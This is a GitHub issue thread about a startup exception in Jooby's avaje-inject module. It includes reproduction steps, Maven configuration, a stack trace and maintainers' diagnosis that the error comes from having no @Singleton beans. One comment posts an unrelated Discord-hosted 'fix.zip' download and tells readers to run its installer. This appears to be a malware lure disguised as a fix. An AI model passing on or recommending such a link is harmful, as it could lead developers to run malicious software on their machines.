### ISSUE TITLE
Dependency Injection Avaje Exception

### ISSUE THREAD

**Issue by ross-oreto** [jooby-project/jooby#3515]
After running new application with jooby-avaje-inject module added, an exception is thrown:
```
Caused by: java.lang.IllegalStateException: Could not find any avaje modules. 
Perhaps using Gradle and IDEA but with a setup issue? 
Review IntelliJ Settings / Build / Build tools / Gradle - 'Build and run using' value and set that to 'Gradle'.  
Refer to https://avaje.io/inject#gradle
```

Jooby version: 3.2.9
Maven: 3.9.3
JDK: 21.0.2
OS: Windows 10

Steps to reproduce:
- Create new jooby project
```
jooby create jooby-test --server undertow
```

- Add dependency:
```
  <dependency>
    <groupId>io.jooby</groupId>
    <artifactId>jooby-avaje-inject</artifactId>
    <version>3.2.9</version>
  </dependency>
```

- Configure compiler plugin
```
  <plugin>
    <artifactId>maven-compiler-plugin</artifactId>
    <version>3.13.0</version>
    <configuration>
      <annotationProcessorPaths>
        <path>
          <groupId>io.avaje</groupId>
          <artifactId>avaje-inject-generator</artifactId>
          <version>10.3</version>
        </path>
      </annotationProcessorPaths>
    </configuration>
  </plugin>
```

Install the module in app.App class:
```
install(AvajeInjectModule.of());
```

Run app
```
mvn jooby:run
```

Expected Result: The application should start with no exceptions
Actual Result: 
```
[2024-09-03 00:43:48,066]-[main] INFO  app.App - Stopped App
[ERROR] execution of app.App resulted in exception
io.jooby.exception.StartupException: Application startup resulted in exception
    at io.jooby.Jooby.start (Jooby.java:1002)
    at io.jooby.Jooby.runApp (Jooby.java:1279)
    at io.jooby.Jooby.runApp (Jooby.java:1239)
    at app.App.main (App.java:16)
Caused by: java.lang.IllegalStateException: Could not find any avaje modules. Perhaps using Gradle and IDEA but with a setup issue? Review IntelliJ Settings / Build / Build tools / Gradle - 'Build and run using' value and set that to 'Gradle'.  Refer to https://avaje.io/inject#gradle
```

**Comment by 777Naity** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by SentryMan** [comment]
Do you have any @Singleton beans?

**Comment by ross-oreto** [comment]
> Do you have any @singleton beans? It seems the exception you are getting is that there are no beans to wire

No I do not, I didn't create anything at all other than what the jooby-cli creates as this is just a fresh project create with the added DI module install.

**Comment by ross-oreto** [comment]
I have confirmed that by just adding a stub record annotated with @Singleton removes this startup exception:

```
import jakarta.inject.Singleton;

@Singleton
public record Test() {
}
```

However, I'm not sure if this is expected behavior of the module/Avaje-inject.

**Comment by SentryMan** [comment]
If you are adding a dependency injection service but there are no dependencies detected, is it not a problem that needs to be rectified?

**Comment by SentryMan** [comment]
>  io.avaje.inject.DBeanScopeBuilder is actually throwing the exception

I've gone ahead and created a [pr to change that](https://github.com/avaje/avaje-inject/pull/687/files)
